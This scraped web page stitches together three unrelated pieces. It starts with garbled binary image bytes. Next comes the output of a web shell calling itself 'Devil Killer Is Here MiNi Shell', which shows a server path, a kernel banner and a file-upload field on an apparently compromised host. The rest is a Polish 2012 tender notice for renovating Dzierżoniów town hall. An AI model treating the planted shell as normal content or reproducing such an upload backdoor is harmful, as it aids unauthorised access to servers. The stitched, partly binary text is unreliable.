JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120123/20207-N-2012.html

<p class="kh_header"><b>Dzierżoniów: Wykonanie robót budowlanych dotyczących realizacji zadania p.n.: Remont zabytkowego Ratusza Miejskiego w Dzierżoniowie w ramach realizacji projektu przewidzianego do współfinansowania z Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013. Priorytet nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców.</b><br>
<b>Numer ogłoszenia: 20207 - 2012; data zamieszczenia: 23.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 074 6450800, faks 074 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzoniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie przewiduje się ustanowienia dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dotyczących realizacji zadania p.n.: Remont zabytkowego Ratusza Miejskiego w Dzierżoniowie w ramach realizacji projektu przewidzianego do współfinansowania z Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013. Priorytet nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje roboty objęte decyzją pozwolenia na budowę nr 789/2008  z dnia 31.12.2008r. i decyzja pozwolenia na budowę nr 836/2009 z dnia 30.11.2009r., 
i dotyczące:  
1)	Remontu elewacji budynku Ratusza, biblioteki i wieży ratuszowej.
2)	Remontu konstrukcji więźby dachowej, lukarn oraz wymiany pokrycia dachowego
i obróbek blacharskich, w tym rynny i rury spustowe.
3)	Wykonania izolacji przeciwwilgociowej ścian fundamentowych.
4)	Wykonania iluminacji budynku Ratusza, biblioteki i wieży ratuszowej.
5)	Remontu fosy doświetlającej okna piwniczne.
6)	Budowy w pasażu obiektów usługowych wraz z instalacjami wewnętrznymi 
i przyłączami wod. - kan. i elektrycznym.
7)	Wymiany instalacji C.O. w bibliotece wraz z jej podłączeniem do węzła cieplnego zlokalizowanego w budynku Urzędu,
8)	Dostawy i montażu aluminiowych masztów flagowych.
3. Przedmiot umowy nie obejmuje:
   3.1 wykonania i montażu elementów dekoracyjnych związanych z lokalną tradycją 
tj. wizerunki np.: smoka, patrona miasta itp.,
Roboty budowlane należy wykonać zgodnie z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót budowlanych. Szczegółowy zakres robót określają:
a)	Projekt budowlany remontu elewacji budynku Urzędu Miasta, biblioteki oraz wieży ratuszowej wraz z projektem zabudowy pasażu usługowego.
b)	Projekt wykonawczy remontu elewacji budynku Urzędu Miasta, biblioteki oraz wieży ratuszowej wraz z projektem zabudowy pasażu usługowego.
c)	Projekt wykonawczy remontu elewacji budynku Urzędu Miasta, biblioteki oraz wieży ratuszowej wraz z projektem zabudowy pasażu usługowego - Tom 2 uzupełnienie.
d)	Projekt budowlany remontu elewacji budynku Urzędu Miasta, biblioteki oraz wieży ratuszowej wraz z projektem zabudowy pasażu usługowego - część sanitarna  przyłącze wody i kanalizacji sanitarnej.
e)	Projekt wykonawczy remontu elewacji budynku Urzędu Miasta, biblioteki oraz wieży ratuszowej wraz z projektem zabudowy pasażu usługowego - budynki usługowe - część sanitarna + zmiana opisu technicznego w zakresie odprowadzenia wód deszczowych z pasażu.
f)Projekt wykonawczy remontu elewacji budynku Urzędu Miasta, biblioteki oraz wieży ratuszowej wraz z projektem zabudowy pasażu usługowego - instalacje elektryczne.
g)Projekt podgrzewania rynien budynku Ratusza i biblioteki wraz ze szczegółową specyfikacją techniczną wykonania i odbioru robót.
h)Projekt budowlany - instalacja centralnego ogrzewania - przebudowa wewnętrznej instalacji C.O. w budynku MPBP.
i)Projekt wykonawczy - instalacja centralnego ogrzewania - przebudowa wewnętrznej instalacji C.O. w budynku MPBP.
j)Projekt budowlano-wykonawczy - instalacja centralnego ogrzewania - przebudowa wewnętrznej instalacji C.O. w budynku MPBP - branża elektryczna.
k)Specyfikacja techniczna wykonania i odbioru robót budowlanych - remont elewacji 
i pokrycia dachu wraz z dobudową ciągu handlowego Urzędu Miasta w Dzierżoniowie.
l)Specyfikacje techniczne wykonania robót remontu elewacji budynku Urzędu Miasta, biblioteki oraz wieży ratuszowej wraz z projektem zabudowy pasażu usługowego - część sanitarna.
m)Specyfikacja techniczna wykonania i odbioru przyłącza wodociągowego i przyłącza kanalizacji sanitarnej.
n)Specyfikacja techniczna wykonania i odbioru robót - instalacje elektryczne.
o)Specyfikacja techniczna - instalacja centralnego ogrzewania - przebudowa wewnętrznej instalacji C.O. w budynku MPBP.
p)Szczegółowa specyfikacja techniczna - węzeł cieplny dla budowy instalacji elektrycznych modernizowanego systemu grzewczego w budynku MPBP.
2Wykonawca, oprócz obowiązków wynikających z pkt. 1, zobowiązuje się do:
1)przejęcia terenu budowy i jego zabezpieczenia ogrodzeniem tymczasowym,
2)należytego, bieżącego utrzymania terenu budowy i prowadzenia robót w sposób jak najmniej utrudniający pracę Urzędu, biblioteki czy restauracji. Zamawiający nie zezwala na wykorzystywanie wewnętrznych ciągów komunikacyjnych Urzędu dla potrzeb transportu technologicznego za wyjątkiem wykonania tynków renowacyjnych,   
3)pozostawienia robót na okres zimowy, w takim stanie, aby Urząd funkcjonował bez zakłóceń, 
4)zabezpieczenie okien w trakcie prowadzenia robót elewacyjnych,
5)organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników. Zamawiający nie przewiduje udostępnienia pomieszczeń socjalno-bytowych dla pracowników budowy,
6)zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę, w tym montaż podliczników energii elektrycznej i wody,
7)niezwłoczne wyczyszczenie nawierzchni ulic w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń,
8)uporządkowania terenu budowy i terenu przyległego po zakończeniu robót,
9)składowania gruzu w kontenerach i ich wynajęcia,
10)wywozu materiału i gruzu z rozbiórki na składowisko odpadów (około 12 km od Dzierżoniowa),
11)załadunku, rozładunku i wywozu na składowisko złomu zdemontowanych elementów centralnego ogrzewania w bibliotece. Protokół przekazania złomu ma również określać sztuki grzejników. Pozyskane ze sprzedaży pieniądze należy przekazać dla Miejsko- Powiatowej Biblioteki Publicznej, Rynek 2, 
12)załadunku, rozładunku i wywozu na składowisko złomu zdemontowanego pokrycia dachowego z blachy oraz rynien i rur spustowych. Pozyskane ze sprzedaży pieniądze należy przekazać dla Zamawiającego, 
13)zabezpieczenia folią regałów bibliotecznych w trakcie wykonywania robót budowlanych w bibliotece, przenoszenia księgozbiorów i przesuwania regałów dla potrzeb wykonania instalacji C.O. oraz demontaż i ponowny montaż regałów ściennych,
14)obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF), 
15)uzyskania decyzji na zajęcie pasa drogowego dla potrzeb zaplecza budowy, składowania materiałów budowlanych, wykonania izolacji ścian fundamentowych, ustawienia rusztowania, kontenerów na gruz i wykonania przyłącza wod. - kan. dla pawilonów usługowych i  pokrycia kosztów za zajęcie przedmiotowego pasa drogowego. Koszt zajęcia pasa drogowego wynosi 2,00 zł/m2/dobę. Obszar objęty uzyskaniem przedmiotowej decyzji obejmuje teren od strony elewacji wschodniej i od strony elewacji południowej na odcinku od początku fosy do elewacji wschodniej tj. odcinek około 30,5m. Teren od strony elewacji zachodniej, północnej i pozostała część długości elewacji południowej zostanie przekazany Wykonawcy w użyczenie,
16)uzyskania decyzji administracyjnych i pokrycia kosztów uzgodnień związanych          
z realizacją zadania oraz realizacji i poniesienia wszelkich kosztów związanych 
z realizacją i wypełnieniem wszystkich zobowiązań wynikających z decyzji, uzgodnień, postanowień, kwestionariuszy, warunków przyłączenia i opinii stanowiących integralną część projektu budowlanego,
17)wykonania projektu tymczasowej organizacji ruchu dla potrzeb wykonania przyłącza wod. - kan., uzyskania ze Starostwa Powiatowego w Dzierżoniowie zgody na jej wprowadzenie oraz wprowadzenie jej i utrzymanie, 
18)wykonania badań i pomiarów w czasie wykonywania robót budowlanych i badań odbiorczych zgodnie ze specyfikacjami technicznymi wykonania i odbioru robót oraz wszystkich badań, sprawdzeń i pomiarów niezbędnych przy składaniu zawiadomienia 
o zakończeniu budowy w Powiatowym Inspektoracie Nadzoru Budowlanego,
19)wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,
20)przedłożenia Zamawiającemu w dniu przekazania placu budowy uzgodnienia 
w zakresie gospodarki odpadami, wydanego na podstawie ustawy o odpadach,
21)dostarczenia Zamawiającemu oświadczenia kierownika budowy o przeszkoleniu     
w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy,
22)zgłaszania na bieżąco do odbioru wszystkich prac związanych z budową przyłącza wod. - kan. oraz robót podlegających zakryciu,
23)poniesienia opłaty za odbiory wykonywane przez Wodociągi i Kanalizacja Sp. z o.o.  z siedzibą w Dzierżoniowie, ul. Kilińskiego 25a, 
24)wykonania dezynfekcji i płukania sieci wodociągowej, badań bakteriologicznych    i fizykochemicznych wody,
25)uzyskania decyzji PSSE w Dzierżoniowie na wbudowane materiały związane z budową przyłącza wodociągowego,
26)przekazania Zamawiającemu oświadczeń o podjęciu obowiązków przez kierownika budowy i kierowników branżowych w terminie 3 dni od daty podpisania umowy,
27)uczestnictwa kierownika budowy w cotygodniowych naradach, na których m.in. będzie kontrolowane stosowania wymogów związanych z ochroną środowiska i BHP; informujemy, że Urząd wdrożył normę środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004,
28)przestrzegania i realizacji decyzji nr 707/2008 z dnia 10.12.2008r. Dolnośląskiego Wojewódzkiego Konserwatora Zabytków,
29)Odtworzenia nawierzchni ciągów pieszych, chodników z kostki mozaikowej 
i kamiennej.
UWAGA: Przed przystąpieniem do robót Wykonawca zobowiązany jest posiadać uzgodnienia w zakresie gospodarki odpadami na podstawie Ustawy o odpadach. Wykonawca jest wytwórcą odpadów w rozumieniu ustawy o odpadach i na nim ciążą wszystkie obowiązki określone 
w ww. ustawie. Wykonawca ponosi wszelkie koszty związane z usunięciem odpadów z miejsca wytworzenia, wraz z wykorzystaniem odpadów i ich unieszkodliwieniem.
W przypadku, gdy w Projektach budowlanych i wykonawczych  i specyfikacjach technicznych wykonania i odbioru robót budowlanych zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów i urządzeń, Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że zagwarantują one realizację robót w zgodzie z Prawem budowlanym i odpowiednimi normami, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w sporządzonej dokumentacji projektowej oraz zostaną one wcześniej zaakceptowane przez Zamawiającego.
Zamawiający dopuszcza możliwość wykonania przedmiotu zamówienia z innym wyposażeniem równoważnym wyposażeniu projektowanemu do zainstalowania, a za ofertę równoważną Zamawiający uzna przyjęcie parametrów technicznych pod warunkiem, 
że wyposażenie, urządzenia oferowane przez Wykonawcę jako równoważne spełni wymagania określone przez Zamawiającego w SIWZ, projektach budowlanych i wykonawczych oraz specyfikacjach technicznych wykonania i odbioru robót budowlanych. 
Zamawiający informuje, że podane w projekcie budowlanym konkretne propozycje urządzeń  mają na celu wyłącznie określenie standardu wykonania lub przyjętego rozwiązania materiałowego i mogą być zastąpione urządzeniami równoważnymi nie powodującymi zmiany ilości wyspecyfikowanych urządzeń. 
Zamawiający dopuszcza rozwiązania równoważne, ale na podstawie art. 30 ust. 5 ustawy  
to na Wykonawcy spoczywa obowiązek wykazania na etapie składania ofert, że oferowane przez niego wyposażenie, urządzenia spełniają wymagania określone przez Zamawiającego.
W związku z tym, że przedmiot zamówienia objęty niniejszym postępowaniem przewidziany jest do dofinansowania ze środków unijnych, Wykonawca zobowiązuje się do stosowania loga Unii Europejskiej oraz zapis projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013, we wszystkich dokumentach rozliczeniowych (np.: protokoły i inne) jak również w korespondencji związanej z realizacją przedmiotowej inwestycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.44.30.00-4, 45.31.12.00-2, 45.33.11.00-7, 45.26.10.00-4, 45.33.24.00-7, 45.32.00.00-6, 45.42.11.40-7, 45.42.11.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać wykonanie w załączniku nr 6 do SIWZ roboty budowlane
w zakresie: 
 a) remontu elewacji obiektów zabytkowych nieruchomych (kubaturowych) wpisanych do rejestru zabytków; wykazanie min. 1 roboty wykonanej w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, o kubaturze nie mniejszej niż  10 000,00 m3, z podaniem jej rodzaju i wartości, daty 
i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 
b) wymiany pokryć dachowych na obiektach zabytkowych nieruchomych (kubaturowych) wpisanych do rejestru zabytków z blachy; wykazanie min. 1 roboty wykonanej w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, o powierzchni nie mniejszej niż 600 m2, z podaniem jej rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. 
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać w załączniku nr 5 do SIWZ osoby, które będą kierować robotami budowlanymi 
w następujących specjalnościach:
1)	konstrukcyjno - budowlanej z co najmniej 2-letnią praktyką na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków potwierdzoną przez konserwatora zabytków,
2)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych z co najmniej 2-letnią praktyką na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków potwierdzoną przez konserwatora zabytków,
3)	instalacyjnej w zakresie sieci, instalacji  i urządzeń cieplnych,  wentylacyjnych, wodociągowych i kanalizacyjnych z co najmniej 2-letnią praktyką na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków potwierdzoną przez konserwatora zabytków,
4)	konserwatorem dzieł sztuki uprawnionym do prowadzenia i nadzorowania prac konserwatorskich przy zabytkach wpisanych do rejestru zabytków. 
- wraz z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia
i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez te osoby czynności, oraz informacją o podstawie do dysponowania tymi osobami oraz złożenie oświadczenia, że osoby, które będą kierować robotami budowlanymi w ww. specjalnościach posiadają wymagane uprawnienia - poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	W zakresie terminu i wynagrodzenia:
a)	w przypadku błędów lub braków projektowych (z winy projektanta lub nie) jest konieczna zmiana technologii wykonania robót budowlanych bądź wykonania zamówień dodatkowych by obiekt mógł spełniać swoje przeznaczenie, 
b)	z powodu działania okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć 
z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
c)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które 
to działania nie są konsekwencją winy którejkolwiek ze stron,
d)	z powodu niewykonania na wniosek Zamawiającego części robót.
2)	W przypadku wystąpienia robót zamiennych dopuszcza się zmianę umowy w zakresie terminu wykonania, wynagrodzenia w sytuacji gdy wystąpi:
1)	podniesienie bezpieczeństwa,
2)	materiały budowlane przewidziane w umowie do wykonania zamówienia nie mogą być użyte przy realizacji inwestycji z powodu zaprzestania ich produkcji 
lub zastąpienia innymi,
3)	w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa budowlanego, 
4)	w trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa mająca wpływ na opisany przedmiot zamówienia,
5)	w trakcie realizacji zamówienia zastosowano za zgodą Zamawiającego lepsze materiały budowlane.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót 
w miejscu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/pl/bip/przetargi/ogloszenia_przetargi/przetargi_inwestycje<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2012 godzina 12:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Remont zabytkowego Ratusza Miejskiego w Dzierżoniowie
w ramach realizacji projektu przewidzianego do współfinansowania z Europejskiego Funduszu Rozwoju Regionalnego, w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013. Priorytet nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców..</p>
